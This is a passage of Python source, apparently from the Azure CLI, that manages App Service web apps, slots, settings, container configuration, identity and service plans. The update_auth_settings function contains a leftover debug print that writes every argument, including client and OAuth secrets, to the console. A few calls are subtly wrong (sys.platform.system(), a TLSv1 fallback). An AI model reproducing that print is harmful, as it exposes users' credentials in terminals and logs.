zip_content = fs.read()
requests.post(zip_url, data=zip_content, headers=headers)
# check the status of async deployment
response = _check_zip_deployment_status(deployment_status_url, authorization, timeout)
return response
def get_sku_name(tier): # pylint: disable=too-many-return-statements
tier = tier.upper()
if tier == 'F1' or tier == "FREE":
return 'FREE'
elif tier == 'D1' or tier == "SHARED":
return 'SHARED'
elif tier in ['B1', 'B2', 'B3', 'BASIC']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
elif tier in ['P1V2', 'P2V2', 'P3V2']:
return 'PREMIUMV2'
elif tier in ['PC2', 'PC3', 'PC4']:
return 'PremiumContainer'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
result = list(client.deleted_web_apps.list())
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
print(arg, values[arg])
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None,
linux_fx_version=None, windows_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None): # pylint: disable=unused-argument
configs = get_site_configs(cmd, resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
clone_from_prod = None
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
if configuration_source:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
result.name = result.name.split('/')[-1]
return result
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
else:
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
import time
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list())
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, sku='B1', number_of_workers=None,
location=None, tags=None):
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
instance.sku = sku_def
if admin_site_name is not None:
